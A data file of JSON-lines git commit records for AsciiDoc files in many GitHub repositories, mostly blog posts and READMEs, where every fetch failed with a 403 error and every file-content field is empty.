{"commit":"8111a389e4cb12ef92e8f2d524b6a8a17f2413bb","subject":"Footnote","message":"Footnote\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e1f6d14c1b8605bf40c24f6590befc4fbab9cceb","subject":"y2b create post 3 Cool Gadgets Under $40","message":"y2b create post 3 Cool Gadgets Under $40","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-11-3-Cool-Gadgets-Under-40.adoc","new_file":"_posts\/2017-04-11-3-Cool-Gadgets-Under-40.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"926be246817902862d44dfecb88ef9c958162a97","subject":"y2b create post It Looks Like A Speaker...","message":"y2b create post It Looks Like A Speaker...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-10-It-Looks-Like-A-Speaker.adoc","new_file":"_posts\/2017-06-10-It-Looks-Like-A-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca176143e0e0f48c3a5462651c0b9e0ca55a48e1","subject":"y2b create post DON'T Buy The Batband, Unless...","message":"y2b create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-03-DONTBuyTheBatbandUnless.adoc","new_file":"_posts\/2017-12-03-DONTBuyTheBatbandUnless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a952750bfabc26c572bcb44325af2c86721ee565","subject":"Update 2018-04-02-Contextual-Styling-Demo.adoc","message":"Update 2018-04-02-Contextual-Styling-Demo.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-04-02-Contextual-Styling-Demo.adoc","new_file":"_posts\/2018-04-02-Contextual-Styling-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4a7f852e5b8e69325246e72799f9a35d18423d1","subject":"Publish 1993-11-17.adoc","message":"Publish 
1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba73280f3afe7aadd8c00c11a3acd75d2a421081","subject":"Publish 2016-9-6.adoc","message":"Publish 2016-9-6.adoc","repos":"jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study","old_file":"2016-9-6.adoc","new_file":"2016-9-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjmean2\/server-study.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d0fae348891628b86967120227becdbb0c3d212","subject":"Update 2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","message":"Update 2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","new_file":"_posts\/2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc14e95b8d79d98e0cbb241aee21ffe7e77025b7","subject":"Add Changelog (#1971)","message":"Add Changelog (#1971)\n\nFixes: #1907.\r\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db6391370d4b2d7e5050fbf4c39b03592d073aac","subject":"Add readme","message":"Add readme\n","repos":"noamt\/smarchive","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noamt\/smarchive.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb5dc81399761e4df986eefc2037165ee7981579","subject":"Update 2015-08-31-Java-8-Stream-et-Iterator.adoc","message":"Update 2015-08-31-Java-8-Stream-et-Iterator.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-08-31-Java-8-Stream-et-Iterator.adoc","new_file":"_posts\/2015-08-31-Java-8-Stream-et-Iterator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"fb448f4737cc131c6d8fc8ce92c80a5a735b9748","subject":"y2b create post Best Buy Rewards Unboxing Preview","message":"y2b create post Best Buy Rewards Unboxing Preview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-12-Best-Buy-Rewards-Unboxing-Preview.adoc","new_file":"_posts\/2011-12-12-Best-Buy-Rewards-Unboxing-Preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d232ba58360f9995ab0af69a76adc5e8964adda","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb47ac10b755972231f1073143267c16992df1d7","subject":"Update 2014-09-15-Christening-the-Grimoire.adoc","message":"Update 2014-09-15-Christening-the-Grimoire.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-15-Christening-the-Grimoire.adoc","new_file":"_posts\/2014-09-15-Christening-the-Grimoire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12a0a6ab312613addc0c87c2e9051934ce00cab","subject":"new requirements doc. in progress","message":"new requirements doc. 
in progress\n","repos":"kbase\/nextgen,kbase\/nextgen,kbase\/nextgen","old_file":"docs\/design\/data\/requirements.asciidoc","new_file":"docs\/design\/data\/requirements.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kbase\/nextgen.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c806fb6e52caac6ee5c20635de27fafd552c0080","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f61372b6b9c0eb22e8349a7c64227e2c6f7c9f3f","subject":"Added README file for github.","message":"Added README file for github.\n","repos":"bmharper\/tundra,deplinenoise\/tundra,bmharper\/tundra,bmharper\/tundra,deplinenoise\/tundra,bmharper\/tundra,deplinenoise\/tundra","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bmharper\/tundra.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0420ab97fe5333e2a0e370a7252ad2100404ae","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34576f0d604c08bacb7ca72c11db5ce2e4d2d21a","subject":"y2b create post iPad Mini Unboxing (New Apple iPad Mini Unboxing 2012)","message":"y2b create post iPad Mini Unboxing (New Apple iPad Mini Unboxing 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-02-iPad-Mini-Unboxing-New-Apple-iPad-Mini-Unboxing-2012.adoc","new_file":"_posts\/2012-11-02-iPad-Mini-Unboxing-New-Apple-iPad-Mini-Unboxing-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ade33a4101fd7f17977625ac787047f5c2cef1","subject":"Update 2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","message":"Update 2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","new_file":"_posts\/2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ae74931b8c058ed5a6ccd9e406132e493809f21","subject":"Add a README","message":"Add a README\n","repos":"chungy\/reflac","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chungy\/reflac.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"c36b54ab0416e33a241a7b245122051c8cfd9eb1","subject":"Readme improvements","message":"Readme improvements\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee1a31429b9118a28d544e4973d99ac5a801f40d","subject":"Add readme with installation and usage instructions","message":"Add readme with installation and usage instructions\n","repos":"rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rodm\/teamcity-gradle-init-scripts-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1c13e99456fd0c755ba122200b57056e2a2bbbc","subject":"Prereq","message":"Prereq\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client.adoc","new_file":"WS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"778d7a4a0c1367ab95f3a300990cb2d31fbb2aa7","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c4e7a099922b1b049895f52cacec865f928b1d8","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eff6690609947d336d246f868b35771a3ff263af","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 
2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f794cf675d1f439c8227aae1cf087734571a039f","subject":"Update 2016-12-1-re-Invent2016.adoc","message":"Update 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cfa148497e3832daa7c209cb354afda8f6dbc84","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9c37b9c64967fe16795c5ba7d16c8e288e76191","subject":"Strutturazione iniziale","message":"Strutturazione iniziale\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"463b196a60b754c7c05f57141e390f24f615e5bd","subject":"[ALV #5032] Update doc concerning nullable fields in subobjects","message":"[ALV #5032] Update doc concerning nullable fields in subobjects\n","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/doc.adoc","new_file":"src\/docs\/asciidoc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a65db4e3d752fd5d5f671e61532a2de7527493c","subject":"Update 2017-01-02-Wish-list-for-2017.adoc","message":"Update 2017-01-02-Wish-list-for-2017.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2017-01-02-Wish-list-for-2017.adoc","new_file":"_posts\/2017-01-02-Wish-list-for-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76639dead7eecbedf25c1ed86f97b719a9c9bda8","subject":"Create UserGuide.adoc","message":"Create UserGuide.adoc","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"UserGuide.adoc","new_file":"UserGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a33c23033b233fd6fda1cbc56e75a5d427631a94","subject":"migrated last post","message":"migrated last post\n","repos":"sebastianslutzky\/blog,sebastianslutzky\/blog","old_file":"_posts\/2015-11-24-take-control-of-your-api-aspects.adoc","new_file":"_posts\/2015-11-24-take-control-of-your-api-aspects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebastianslutzky\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01c82a58fb27c566ce6356a7ea44de1883e79a79","subject":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff033416e191b113dba89fe56ae33fc3ee7dc704","subject":"Pr\u00e9c corr","message":"Pr\u00e9c corr\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95b706a16c4cbdf74753d625aa622e9070769c21","subject":"y2b create post You've Never Seen Glasses Like This...","message":"y2b create post You've Never Seen Glasses Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-05-Youve-Never-Seen-Glasses-Like-This.adoc","new_file":"_posts\/2017-03-05-Youve-Never-Seen-Glasses-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3b48003eb6e87046cbb32d728bb7f4273ebd7e4","subject":"Update 2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","message":"Update 2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","new_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"503d61321764ab5609aff6911b6bbb02945150ea","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55615c4d323ba083c420ee046bfde8b977bbd03b","subject":"Update 2017-02-25adocadoc-part-1.adoc","message":"Update 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cd945f66b3d40289137c8dcd5e5721e3b38e2a1","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c13c0ee0b71a8052eacf5d528a6f78c0706c1123","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52ff8e1f53960331fd9ba390745c7dad1d38ff07","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a0bde7d8261c312e66ba0c5f5079d3c4c57203d","subject":"Create index.adoc","message":"Create index.adoc","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da005e87fabf5919f71262acaeedecadd788b428","subject":"test adoc commit","message":"test adoc commit\n","repos":"stitchfix\/clouddriver,duftler\/clouddriver,ajordens\/clouddriver,danveloper\/clouddriver,spinnaker\/clouddriver,danveloper\/clouddriver,lookout\/clouddriver,spinnaker\/clouddriver,lookout\/clouddriver,duftler\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,duftler\/clouddriver,duftler\/clouddriver,ajordens\/clouddriver,cfieber\/clouddriver,lookout\/clouddriver,danveloper\/clouddriver,cfieber\/clouddriver,cfieber\/clouddriver,ajordens\/clouddriver,stitchfix\/clouddriver,spinnaker\/clouddriver","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spinnaker\/clouddriver.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"464f6a4f1ef014469d8f6a3e95746a4d95f22045","subject":"Remove duplicate title in README","message":"Remove duplicate title in README","repos":"asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47581a922b637bda2a5955508020eab3f9c43ca","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"37b50309aabc4804b09face3c11f292315914921","subject":"Update 2017-06-25-Dealing-with-team-rejection.adoc","message":"Update 